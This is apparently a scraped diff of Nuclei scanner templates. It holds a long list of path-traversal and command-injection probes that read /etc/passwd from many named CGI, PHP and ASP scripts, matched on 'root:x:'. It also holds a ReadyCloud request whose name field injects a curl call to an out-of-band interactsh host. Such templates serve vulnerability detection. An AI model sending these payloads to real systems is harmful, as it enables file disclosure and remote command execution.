"forum_arc.asp?n=/../../../../../../../../etc/passwd|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'." 370 + - "forum_arc.asp?n=/etc/passwd%00|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'." 371 + - "forum_arc.asp?n=/etc/passwd|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'." 372 + - "forum_professionnel.asp?n=%60/etc/passwd%60|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'`'." 373 + - "forum_professionnel.asp?n=../../../../../../../../../etc/passwd%00|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'." 374 + - "forum_professionnel.asp?n=/../../../../../../../../etc/passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'." 375 + - "forum_professionnel.asp?n=/etc/passwd%00|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'." 376 + - "forum_professionnel.asp?n=/etc/passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'." 377 + - "gallery/index.php?include=../../../../../../../../../etc/passwd" 378 + - "generate.cgi?content=../../../../../../../../../../etc/passwd%00board=board_1" 379 + - "guestbook.cgi?user=cpanel&template=|/bin/cat%20/etc/passwd|" 380 + - "hsx.cgi?show=../../../../../../../../../../../etc/passwd%00" 381 + - "htgrep?file=index.html&hdr=/etc/passwd" 382 + - "htmlscript?../../../../../../../../../../etc/passwd" 383 + - "htsearch?exclude=%60/etc/passwd%60" 384 + - "i?/etc/passwd" 385 + - "imprimer.asp?no=%60/etc/passwd%60|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'`'." 386 + - "imprimer.asp?no=../../../../../../../../../etc/passwd%00|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'." 387 + - "imprimer.asp?no=/../../../../../../../../etc/passwd|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'." 388 + - "imprimer.asp?no=/etc/passwd%00|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'." 389 + - "imprimer.asp?no=/etc/passwd|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'." 390 + - "index.php?download=/etc/passwd" 391 + - "index.php?l=forum/view.php&topic=../../../../../../../../../etc/passwd" 392 + - "index.php?page=../../../../../../../../../../etc/passwd" 393 + - "index.php?|=../../../../../../../../../etc/passwd" 394 + - "info2www '(../../../../../../../bin/mail root </etc/passwd>" 395 + - "ion-p?page=../../../../../etc/passwd" 396 + - "jsp/jspsamp/jspexamples/viewsource.jsp?source=../../../../../../../../../../etc/passwd" 397 + - "jsp/jspsamp/jspexamples/viewsource.jsp?source=/../../../../../../../../../etc/passwd" 398 + - "k/home?dir=/&file=../../../../../../../../etc/passwd&lang=kor" 399 + - "loadpage.cgi?user_id=1&file=../../../../../../../../../../etc/passwd" 400 + - "logbook.pl?file=../../../../../../../bin/cat%20/etc/passwd%00|" 401 + - "magiccard.cgi?pa=3Dpreview&next=3Dcustom&page=3D../../../../../../../../../../etc/passwd" 402 + - "mail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00" 403 + - "mail/nph-mr.cgi?do=loginhelp&configLanguage=../../../../../../../etc/passwd%00" 404 + - "mailview.cgi?cmd=view&fldrname=inbox&select=1&html=../../../../../../etc/passwd" 405 + - "main.cgi?board=FREE_BOARD&command=down_load&filename=../../../../../../../../../../etc/passwd" 406 + - "modif_infos.asp?n=%60/etc/passwd%60" 407 + - "modif_infos.asp?n=../../../../../../../../../etc/passwd%00" 408 + - "modif_infos.asp?n=/../../../../../../../../../etc/passwd" 409 + - "modif_infos.asp?n=/etc/passwd" 410 + - "modif_infos.asp?n=/etc/passwd%00" 411 + - "modules.php?set_albumName=album01&id=aaw&op=modload&name=gallery&file=index&include=../../../../../../../../../etc/passwd" 412 + - "mrtg.cfg?cfg=../../../../../../../../etc/passwd" 413 + - "mrtg.cgi?cfg=../../../../../../../../etc/passwd" 414 + - "multihtml.pl?multi=/etc/passwd%00html" 415 + - "mylog.html?screen=/etc/passwd" 416 + - "mylog.phtml?screen=/etc/passwd" 417 + - "netauth.cgi?cmd=show&page=../../../../../../../../../../etc/passwd" 418 + - "netget?sid=user&msg=300&file=../../../../../../../../../../etc/passwd" 419 + - "newsdesk.cgi?t=../../../../../../../../../../etc/passwd" 420 + - "nph-emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00" 421 + - "nph-emumail.cgi?type=/../../../../../../../../../../../../../../../etc/passwd%00" 422 + - "nph-showlogs.pl?files=../../../../../../../../etc/passwd&filter=.*&submit=Go&linecnt=500&refresh=0" 423 + - "opendir.php?/etc/passwd" 424 + - "opendir.php?requesturl=/etc/passwd" 425 + - "page.cgi?../../../../../../../../../../etc/passwd" 426 + - "pals-cgi?palsAction=restart&documentName=/etc/passwd" 427 + - perl/-e%20%22system('cat%20/etc/passwd');\%22 428 + - "pfdispaly.cgi?'%0A/bin/cat%20/etc/passwd|'" 429 + - "pfdispaly.cgi?../../../../../../../../../../etc/passwd" 430 + - "pfdisplay.cgi?'%0A/bin/cat%20/etc/passwd|'" 431 + - "phf.cgi?QALIAS=x%0a/bin/cat%20/etc/passwd" 432 + - "phf?Qname=root%0Acat%20/etc/passwd%20" 433 + - "php.cgi?/etc/passwd" 434 + - "php/mylog.html?screen=/etc/passwd" 435 + - "php/mylog.phtml?screen=/etc/passwd" 436 + - "phprocketaddin/?page=../../../../../../../../../../etc/passwd" 437 + - "phptonuke.php?filnavn=/etc/passwd" 438 + - "phpwebfilemgr/index.php?f=../../../../../../../../../etc/passwd" 439 + - "powerup/r.cgi?FILE=../../../../../../../../../../etc/passwd" 440 + - "publisher/search.cgi?dir=jobs&template=;cat%20/etc/passwd|&output_number=10" 441 + - "put/cgi-bin/putport.exe?SWAP&BOM&OP=none&Lang=en-US&PutHtml=../../../../../../../../etc/passwd" 442 + - "quickstore.cgi?page=../../../../../../../../../../etc/passwd%00html&cart_id=" 443 + - "r.cgi?FILE=../../../../../../../../../../etc/passwd" 444 + - "rubrique.asp?no=%60/etc/passwd%60|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'`'." 445 + - "rubrique.asp?no=../../../../../../../../../etc/passwd%00|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'." 446 + - "rubrique.asp?no=/../../../../../../etc/passwd|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'." 447 + - "rubrique.asp?no=/../../../etc/passwd|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'." 448 + - "rubrique.asp?no=/etc/passwd%00|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'." 449 + - "rubrique.asp?no=/etc/passwd|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'." 450 + - "sawmill5?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1" 451 + - "search.pl?form=../../../../../../../../../../etc/passwd%00" 452 + - "search?NS-query-pat=../../../../../../../../../../etc/passwd" 453 + - "sendtemp.pl?templ=../../../../../../../../../../etc/passwd" 454 + - "servlet/webacc?User.html=../../../../../../../../../../../../../../../../../../etc/passwd%00" 455 + - "sewse?/home/httpd/html/sewse/jabber/comment2.jse+/etc/passwd" 456 + - "shop.cgi?page=../../../../../../../etc/passwd" 457 + - "shop/member_html.cgi?file=;cat%20/etc/passwd|" 458 + - "shop/member_html.cgi?file=|cat%20/etc/passwd|" 459 + - "shop/normal_html.cgi?file=;cat%20/etc/passwd|" 460 + - "shop/normal_html.cgi?file=|cat%20/etc/passwd|" 461 + - "shopper.cgi?newpage=../../../../../../../../../../etc/passwd" 462 + - "shopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;cat%20/etc/passwd|" 463 + - "shoutbox.php?conf=../../../../../../../etc/passwd" 464 + - "shoutbox/expanded.php?conf=../../../../../../../etc/passwd%20" 465 + - "simple/view_page?mv_arg=|cat%20/etc/passwd|" 466 + - "smartsearch.cgi?keywords=|/bin/cat%20/etc/passwd|" 467 + - "smartsearch/smartsearch.cgi?keywords=|/bin/cat%20/etc/passwd|" 468 + - "ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd" 469 + - "store.cgi?StartID=../../../../../../../../../../etc/passwd%00.html" 470 + - "store/index.cgi?page=../../../../../../../../etc/passwd" 471 + - "story.pl?next=../../../../../../../../../../etc/passwd%00" 472 + - "story/story.pl?next=../../../../../../../../../../etc/passwd%00" 473 + - "support/common.php?f=0&ForumLang=../../../../../../../../../../etc/passwd" 474 + - "talkback.cgi?article=../../../../../../../../etc/passwd%00&action=view&matchview=1" 475 + - "technote/main.cgi?board=FREE_BOARD&command=down_load&filename=/../../../../../../../../../../etc/passwd" 476 + - "technote/main.cgi?board=FREE_BOARD&command=down_load&filename=/../../../../../../../../../etc/passwd" 477 + - "tmp_view.php?file=/etc/passwd" 478 + - "traffic.cgi?cfg=../../../../../../../../etc/passwd" 479 + - "ttawebtop.cgi/?action=start&pg=../../../../../../../../../../etc/passwd" 480 + - "userreg.cgi?cmd=insert&lang=eng&tnum=3&fld1=test999%0acat</var/spool/mail/login>>/etc/passwd" 481 + - "ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd" 482 + - "view_item?HTML_FILE=../../../../../../../../../../etc/passwd%00" 483 + - "viewimg.php?path=../../../../../../../../../../etc/passwd&form=1&var=1" 484 + - "viewpage.php?file=/etc/passwd" 485 + - "viewsource?/etc/passwd" 486 + - "way-board.cgi?db=/etc/passwd%00" 487 + - "way-board/way-board.cgi?db=/etc/passwd%00" 488 + - "webMathematica/MSP?MSPStoreID=../../../../../../../../../../etc/passwd&MSPStoreType=image/gif" 489 + - "webbbs/webbbs_config.pl?name=joe&[email protected]&body=aaaaffff&followup=10;cat%20/etc/passwd" 490 + - "webcalendar/forum.php?user_inc=../../../../../../../../../../etc/passwd" 491 + - "webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;cat%20/etc/passwd|&CODE=PHOLD" 492 + - "webdist.cgi?distloc=;cat%20/etc/passwd" 493 + - "webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00" 494 + - "webplus?script=../../../../../../../../../../etc/passwd" 495 + - "webspirs.cgi?sp.nextform=../../../../../../../../../../etc/passwd" 496 + - "whois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd" 497 + - "whois/whois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd" 498 + - "whois_raw.cgi?fqdn=%0Acat%20/etc/passwd" 499 + - "zml.cgi?file=../../../../../../../../../../etc/passwd%00" 500 + - "~nobody/etc/passwd" 501 + attack: clusterbomb 502 + stop-at-first-match: true 503 + matchers: 504 + - type: word 505 + part: body 506 + words: 507 + - 'root:x:' 508 + 509 + redirects: false 510 + -
-
-
-
-
-
-
-
-
-
-
-
-
-
-
skipped 22 lines 23 23 POST /cgi-bin/readycloud_control.cgi?1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111/api/users HTTP/1.1 24 24 Host: {{Hostname}} 25 25 26 - "name":"';$(curl http://{{interactsh-url}});'", 26 + "name":"';$(curl {{interactsh-url}});'", 27 27 "email":"[email protected]" 28 28 29 29 matchers: skipped 7 lines -
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-